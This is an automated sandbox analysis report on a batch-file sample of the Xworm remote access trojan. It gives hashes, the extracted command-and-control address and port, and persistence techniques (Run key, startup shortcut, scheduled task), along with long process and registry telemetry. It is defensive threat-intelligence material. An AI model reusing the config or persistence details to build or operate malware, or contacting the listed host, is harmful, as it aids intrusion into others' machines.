xworm | 1fac7bae52e9f9ab6ca432c19960012a56b318e8146c5c8e3b13ee48cd0f3d92

Resubmissions

19-04-2024 16:29

240419-tzpwtahb64 10

19-04-2024 16:23

240419-tv8hcsha35 10

Analysis

max time kernel
226s
max time network
226s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
19-04-2024 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

302KB
MD5

0c1a78b83c7ad047158bc1c5fbc8ae3f
SHA1

7576726765a96d1ec587021591a593fd832f1f84
SHA256

1fac7bae52e9f9ab6ca432c19960012a56b318e8146c5c8e3b13ee48cd0f3d92
SHA512

ea5164dd67ef0e290d0bd3aac502295eaa3488d44bd7f21a1b01b2cf1eb5056affcb207ebf160d7389123bf1ff5cb5dc8f83afd45b26446ea9ace3ca2de6faac
SSDEEP

6144:NTNutx0XtEktJLSQm6o3Kp/PDDQ9os9zRzj1JCl3Oxa1fYuKORutxQH3W1AN19nv:NXRJo8Vv69f63OwfY7Iutx+3W1ADXdCw

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

147.185.221.18:28789

Attributes

Install_directory
%ProgramData%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3040-53-0x000001B8385A0000-0x000001B8385BA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
31	3040	powershell.exe
37	3040	powershell.exe
902	3040	powershell.exe
969	3040	powershell.exe
1019	3040	powershell.exe
1030	3040	powershell.exe
1035	3040	powershell.exe
1069	3040	powershell.exe
1414	3040	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsBIOS.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsBIOS.lnk	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

WindowsBIOSWindowsBIOSWindowsBIOS

pid process

6000 WindowsBIOS
7724 WindowsBIOS
7792 WindowsBIOS
Loads dropped DLL 1 IoCs

Processes:

ExtremeDumper.exe

pid process

7852 ExtremeDumper.exe

pid	process
6000	WindowsBIOS
7724	WindowsBIOS
7792	WindowsBIOS

pid	process
7852	ExtremeDumper.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsBIOS = "C:\\ProgramData\\WindowsBIOS"	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
30	ip-api.com

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4468 schtasks.exe

pid	process
4468	schtasks.exe

Modifies registry class 64 IoCs

Processes:

ExtremeDumper.exefirefox.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	ExtremeDumper.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\MRUListEx = 00000000ffffffff	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 = 50003100000000008c585564100041646d696e003c0009000400efbe8c58e15b935802832e00000061e10100000001000000000000000000000000000000c23e7f00410064006d0069006e00000014000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	ExtremeDumper.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\0\0 = 4e003100000000008c58b45e100076312e3000003a0009000400efbe874fdb49935802832e000000b21000000000010000000000000000000000000000008e30d400760031002e003000000014000000	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\0	ExtremeDumper.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	ExtremeDumper.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\0 = 7400310000000000874fdb49100057696e646f7773506f7765725368656c6c00540009000400efbe874fdb49935803832e000000b1100000000001000000000000000000000000000000a4eeda00570069006e0064006f007700730050006f007700650072005300680065006c006c00000020000000	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\0\0	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\0\0\MRUListEx = ffffffff	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	ExtremeDumper.exe
Key created	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	ExtremeDumper.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5600310000000000935804831000526f616d696e6700400009000400efbe8c58e15b935804832e0000006de10100000001000000000000000000000000000000f0df0e0152006f0061006d0069006e006700000016000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 56003100000000008c58e15b12004170704461746100400009000400efbe8c58e15b935802832e0000006ce101000000010000000000000000000000000000004e7bc3004100700070004400610074006100000016000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	ExtremeDumper.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	ExtremeDumper.exe

NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\ExtremeDumper.zip:Zone.Identifier firefox.exe
Runs net.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\ExtremeDumper.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWindowsBIOS

pid	process
528	powershell.exe
528	powershell.exe
4996	powershell.exe
4996	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
6000	WindowsBIOS
6000	WindowsBIOS
6000	WindowsBIOS
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

ExtremeDumper.exefirefox.exe

pid process

7852 ExtremeDumper.exe
2768 firefox.exe

pid	process
7852	ExtremeDumper.exe
2768	firefox.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeIncreaseQuotaPrivilege	4996	powershell.exe
Token: SeSecurityPrivilege	4996	powershell.exe
Token: SeTakeOwnershipPrivilege	4996	powershell.exe
Token: SeLoadDriverPrivilege	4996	powershell.exe
Token: SeSystemProfilePrivilege	4996	powershell.exe
Token: SeSystemtimePrivilege	4996	powershell.exe
Token: SeProfSingleProcessPrivilege	4996	powershell.exe
Token: SeIncBasePriorityPrivilege	4996	powershell.exe
Token: SeCreatePagefilePrivilege	4996	powershell.exe
Token: SeBackupPrivilege	4996	powershell.exe
Token: SeRestorePrivilege	4996	powershell.exe
Token: SeShutdownPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeSystemEnvironmentPrivilege	4996	powershell.exe
Token: SeRemoteShutdownPrivilege	4996	powershell.exe
Token: SeUndockPrivilege	4996	powershell.exe
Token: SeManageVolumePrivilege	4996	powershell.exe
Token: 33	4996	powershell.exe
Token: 34	4996	powershell.exe
Token: 35	4996	powershell.exe
Token: 36	4996	powershell.exe
Token: SeIncreaseQuotaPrivilege	4996	powershell.exe
Token: SeSecurityPrivilege	4996	powershell.exe
Token: SeTakeOwnershipPrivilege	4996	powershell.exe
Token: SeLoadDriverPrivilege	4996	powershell.exe
Token: SeSystemProfilePrivilege	4996	powershell.exe
Token: SeSystemtimePrivilege	4996	powershell.exe
Token: SeProfSingleProcessPrivilege	4996	powershell.exe
Token: SeIncBasePriorityPrivilege	4996	powershell.exe
Token: SeCreatePagefilePrivilege	4996	powershell.exe
Token: SeBackupPrivilege	4996	powershell.exe
Token: SeRestorePrivilege	4996	powershell.exe
Token: SeShutdownPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeSystemEnvironmentPrivilege	4996	powershell.exe
Token: SeRemoteShutdownPrivilege	4996	powershell.exe
Token: SeUndockPrivilege	4996	powershell.exe
Token: SeManageVolumePrivilege	4996	powershell.exe
Token: 33	4996	powershell.exe
Token: 34	4996	powershell.exe
Token: 35	4996	powershell.exe
Token: 36	4996	powershell.exe
Token: SeIncreaseQuotaPrivilege	4996	powershell.exe
Token: SeSecurityPrivilege	4996	powershell.exe
Token: SeTakeOwnershipPrivilege	4996	powershell.exe
Token: SeLoadDriverPrivilege	4996	powershell.exe
Token: SeSystemProfilePrivilege	4996	powershell.exe
Token: SeSystemtimePrivilege	4996	powershell.exe
Token: SeProfSingleProcessPrivilege	4996	powershell.exe
Token: SeIncBasePriorityPrivilege	4996	powershell.exe
Token: SeCreatePagefilePrivilege	4996	powershell.exe
Token: SeBackupPrivilege	4996	powershell.exe
Token: SeRestorePrivilege	4996	powershell.exe
Token: SeShutdownPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeSystemEnvironmentPrivilege	4996	powershell.exe
Token: SeRemoteShutdownPrivilege	4996	powershell.exe
Token: SeUndockPrivilege	4996	powershell.exe
Token: SeManageVolumePrivilege	4996	powershell.exe
Token: 33	4996	powershell.exe
Token: 34	4996	powershell.exe
Token: 35	4996	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid process

2768 firefox.exe
2768 firefox.exe
2768 firefox.exe
2768 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

2768 firefox.exe
2768 firefox.exe
2768 firefox.exe

pid	process
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe

pid	process
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

powershell.exefirefox.exeExtremeDumper.exe

pid	process
3040	powershell.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe
7852	ExtremeDumper.exe
7852	ExtremeDumper.exe
2768	firefox.exe
2768	firefox.exe
2768	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exefirefox.exefirefox.exe

description	pid	process	target process
PID 1912 wrote to memory of 4016	1912	cmd.exe	net.exe
PID 1912 wrote to memory of 4016	1912	cmd.exe	net.exe
PID 4016 wrote to memory of 1816	4016	net.exe	net1.exe
PID 4016 wrote to memory of 1816	4016	net.exe	net1.exe
PID 1912 wrote to memory of 528	1912	cmd.exe	powershell.exe
PID 1912 wrote to memory of 528	1912	cmd.exe	powershell.exe
PID 528 wrote to memory of 4996	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 4996	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 3244	528	powershell.exe	WScript.exe
PID 528 wrote to memory of 3244	528	powershell.exe	WScript.exe
PID 3244 wrote to memory of 3408	3244	WScript.exe	cmd.exe
PID 3244 wrote to memory of 3408	3244	WScript.exe	cmd.exe
PID 3408 wrote to memory of 2204	3408	cmd.exe	net.exe
PID 3408 wrote to memory of 2204	3408	cmd.exe	net.exe
PID 2204 wrote to memory of 1212	2204	net.exe	net1.exe
PID 2204 wrote to memory of 1212	2204	net.exe	net1.exe
PID 3408 wrote to memory of 3040	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 3040	3408	cmd.exe	powershell.exe
PID 3040 wrote to memory of 4468	3040	powershell.exe	schtasks.exe
PID 3040 wrote to memory of 4468	3040	powershell.exe	schtasks.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2700 wrote to memory of 2768	2700	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
